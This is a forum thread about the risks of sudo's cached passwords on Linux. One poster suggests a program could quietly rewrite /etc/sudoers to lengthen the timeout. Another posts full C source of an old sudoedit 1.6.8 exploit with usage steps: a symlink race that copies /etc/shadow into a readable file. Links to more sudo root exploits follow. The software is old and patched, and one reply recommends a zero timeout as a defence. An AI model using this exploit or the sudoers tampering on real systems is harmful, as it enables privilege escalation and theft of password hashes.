• Registered: 2010-01-08
  • Posts: 20
  • User Karma: 1

Topic: sudo is dangerous :D

I started to write something for linux and I must admit that the dangers of sudo is alarming. After entering your password will remain active for several minutes (if they do not change the configuration file), so I may well change the permissions to a file and run it as if it was root. You can play as well with syscall:
sys_chmod
sys_lchown
sys_kill
sys_umask
sys_reboot
etcetc
sudo is used (bad) from * buntu, the most used distro in the world.
What do you think?

Sorry for my bad English

Last edited by Mani_Rosse (2011-03-04 00:32:46)

Sardigna Indipendentzia

0

  • From: Teh Interwebs V2.0
  • Registered: 2011-02-18
  • Posts: 37
  • User Karma: 29

Re: sudo is dangerous :D

Privilege escalation vulnerabilities are always nice to find, tho I believe this effects sudo version 1.6.8 only, if I'm thinking about the same vulnerability in the "sudo -u" option giving an attacker read permissions?

Moto: Its good to be Bad, but Its even better to be evil.
Troll Food: Even clever posts to trolls are still troll food.
Advice: Never argue with a idiot, they will drag you down to there level then beat you with experience.
Question: If the truth is out there? Does anyone know the URL?

+1

  • Registered: 2010-01-08
  • Posts: 20
  • User Karma: 1

Re: sudo is dangerous :D

The danger is the "admin" group to which he belongs the same user, so just put him one time password and the program is free to do what he wants (even change the permissions).
system ("sudo chown ...");
execpl ("sudo", "sudo", .....)";
etcetc ..

@TehCAKE
      -u user     The -u (user) option causes sudo to run the specified
                   command as a user other than root.  To specify a uid
                   instead of a user name, use #uid.  When running commands as
                   a uid, many shells require that the '#' be escaped with a
                   backslash ('\').  Note that if the targetpw Defaults option
                   is set (see sudoers(5)) it is not possible to run commands
                   with a uid not listed in the password database.

#>vi /etc/sudoers
Defaults        env_reset, timestamp_timeout=0 <---This changes the time of password caching

If set to 0, the password is always required, but changing it to 300? wink
Write a program that modifies this file is very simple, you only make once the password.

Last edited by Mani_Rosse (2011-03-05 12:48:26)

Sardigna Indipendentzia

  • Registered: 2010-01-07
  • Posts: 52
  • User Karma: 2

Re: sudo is dangerous :D

Mani_Rosse wrote:

I started to write something for linux and I must admit that the dangers of sudo is alarming. After entering your password will remain active for several minutes (if they do not change the configuration file), so I may well change the permissions to a file and run it as if it was root. You can play as well with syscall:
sys_chmod
sys_lchown
sys_kill
sys_umask
sys_reboot
etcetc
sudo is used (bad) from * buntu, the most used distro in the world.
What do you think?

Sorry for my bad English

all i get, is that sudo is dangerous, cause it lasts some minutes...

Everything is just a matter of time.
[Register or log in to view the URL]

  • From: Teh Interwebs V2.0
  • Registered: 2011-02-18
  • Posts: 37
  • User Karma: 29

Re: sudo is dangerous :D

@Mani_Rosse You might find this exploit a useful resource for ideas.

Code:

/*

       Copyright © Rosiello Security 2004
            [url]http://www.rosiello.org[/url]

                 sudoedit Exploit


SOFTWARE : sudoedit 
REFERENCE: [url]http://www.sudo.ws/sudo/alerts/sudoedit.html[/url]
DATE: 18/09/2004

Summary:
A flaw in exists in sudo's -u option (aka sudoedit) 
in sudo version 1.6.8 that can give an attacker 
read permission to a file that would otherwise be 
unreadable.

Sudo versions affected:
1.6.8 only

Credit: 
Reznic Valery discovered the problem. 

-----------------------------------------------------------

All the information that you can find in this software  
were published for educational and didactic purpose only.
The author published this program under the condition 
that is not in the intention of the reader to use them 
in order to bring to himself or others a profit or to bring 
to others damage.

!Respect the law!

How do I use this code ?

To exploit sudoedit you have to open with it the
file "rosiello" as shown in the example.

EXAMPLE SCENARIO:

1) Open two shells (i) and (ii);
2) (i)$sudoedit rosiello;
3) (ii)$./sudoedit-exploit /etc/shadow;
4) (i) close sudoedit.

The file "rosiello" is now a copy of "/etc/shadow".

AUTHOR : Angelo Rosiello
CONTACT: angelo rosiello org

*/

#include <stdio.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdio.h>
#include <dirent.h>


int main( int argc, char *argv[] )
{    
    char PATH[]="/usr/tmp";
    char file[32];
       DIR *tmp;
       struct dirent *de;
       tmp = opendir ( PATH );
    int found = 0;
    
    printf( "Copyright © Rosiello Security 2004\n" );
    printf( "http://www.rosiello.org\n" );

    if( argc!=2 )
    {
        printf( "USAGE: %s file\n", argv[0] );
        return( 0 );
    }


    while ( (de = readdir ( tmp ))!= NULL )
    {
        if ( (strstr(de->d_name, "rosiello") != NULL) )
           {
            if( strlen(de->d_name) > 24 ) return( 0 ); 
            sprintf( file, "%s/%s", PATH, (char *)de->d_name );
            remove( file );
            if( fork()!=0 )
            {
                execl( "/bin/ln", "ln", "-s", argv[1], file, NULL ); 
            }
            wait( );
            printf( "Now you can close sudoedit and reopen rosiello!\n" );
            found=1;
            goto end;
        
        }
        
       }
    end:
    closedir( tmp );
    
    if( !found ) 
        printf( "File Not Found!\n" );
    return( 0 );
    
}

Source: SudoEdit 1.6.8 Local Change Permission Exploit [Register or log in to view the URL]

Reference: CVE 2010-0426 [Register or log in to view the URL]
Reference: CVE 2010-1163 [Register or log in to view the URL]

Moto: Its good to be Bad, but Its even better to be evil.
Troll Food: Even clever posts to trolls are still troll food.
Advice: Never argue with a idiot, they will drag you down to there level then beat you with experience.
Question: If the truth is out there? Does anyone know the URL?

  • Registered: 2010-01-08
  • Posts: 20
  • User Karma: 1

Re: sudo is dangerous :D

Thanks TehCAKE. For me at first post karma -1 ?? sad I'm a newbie...

Last edited by Mani_Rosse (2011-03-05 21:48:54)

Sardigna Indipendentzia

  • From: Teh Interwebs V2.0
  • Registered: 2011-02-18
  • Posts: 37
  • User Karma: 29

Re: sudo is dangerous :D

Mani_Rosse wrote:

Thanks TehCAKE

Always a pleasure Mani your post sparked my own interest in sudo vulnerabilities, for further sudo exploits I would keep an eye on [Register or log in to view the URL] and or [Register or log in to view the URL] most get patched pretty quick thou.

I also found these which you may find interesting resources: "Some are out-dated but still maybe of use."
Sudo Off-by-One POC Exploit [Register or log in to view the URL]
Todd Miller Sudo Local root Exploit [Register or log in to view the URL]
Flaw in Runas Group Password Checking [Register or log in to view the URL]

Mani_Rosse wrote:

For me at first post karma -1

Yeah I don't quite get that! sad

Last edited by TehCAKE (2011-03-06 08:04:34)

Moto: Its good to be Bad, but Its even better to be evil.
Troll Food: Even clever posts to trolls are still troll food.
Advice: Never argue with a idiot, they will drag you down to there level then beat you with experience.
Question: If the truth is out there? Does anyone know the URL?

  • Registered: 2011-11-03
  • Posts: 6

Re: sudo is dangerous :D

Yes I always set sudo timeout to 0, I think that should be made the default for all major distros.